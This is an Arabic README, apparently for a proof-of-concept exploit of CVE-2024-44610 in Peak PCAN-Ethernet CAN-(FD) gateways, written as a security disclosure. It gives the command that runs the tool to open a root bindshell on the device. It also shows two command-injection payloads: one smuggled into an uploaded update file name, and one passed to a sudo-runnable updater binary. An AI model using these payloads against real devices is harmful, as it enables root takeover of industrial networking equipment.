
CVE-2024-44610: استغلال root عن بعد موثّق في بوابات Peak PCAN-Ethernet CAN-(FD)
يحتوي هذا المستودع على استغلال إثبات المفهوم (PoC) ينفذ كودًا بصلاحيات الجذر على بوابات Peak Ethernet. يتطلب معرفة بيانات اعتماد واجهة الويب.
قدم البائع بسرعة برنامج ثابت محدث:
قم بتجميع البرنامج باستخدام Goland ثم قم بتشغيله كما يلي:
./PcanExploit -ip 192.168.1.10 -httpaddr 192.168.1.250 -user admin -pass admin [-fd]
إذا نجح الاستغلال، سيتم بدء شل مقيد (bindshell) على الجهاز بصلاحيات الجذر. يمكنك رؤية لقطتين شاشتين في أسفل هذه الصفحة.
الخيارات لها المعاني التالية:
بينما يكون الإصدار غير FD أيضًا عرضة للخطر، إلا أن هذا ذو أهمية عملية ضئيلة لأن هذه الأجهزة لا تنفذ تحديثات برمجية موقعة، وبالتالي يمكنك ببساطة رفع برنامجك الثابت المعدل.
يتم استخدام ثغرتين لحقن أوامر الشل:
من الممكن تضمين أمر شل في اسم ملف حزمة التحديث التي يتم رفعها إلى واجهة الويب، على سبيل المثال:
test';ping 1.1.1.1;'.raucb
سيتم تنفيذ الأمر كمستخدم www-data الذي يقوم بتشغيل خادم الويب. يجب أن يكون لاسم الملف الامتداد الصحيح (tar أو raucb حسب الجهاز)
تقوم البرمجية الثنائية داخليًا بتشغيل system على اسم الملف المقدم، طالما أنه موجود. يمكن استغلالها على النحو التالي:
sudo /home/peak/updater -f "a;ping 1.1.1.1;"
نظرًا لأنه يمكن تشغيل هذه البرمجية الثنائية عبر sudo، فمن الممكن تنفيذ الأمر كجذر.
جهاز FD:

جهاز غير FD:
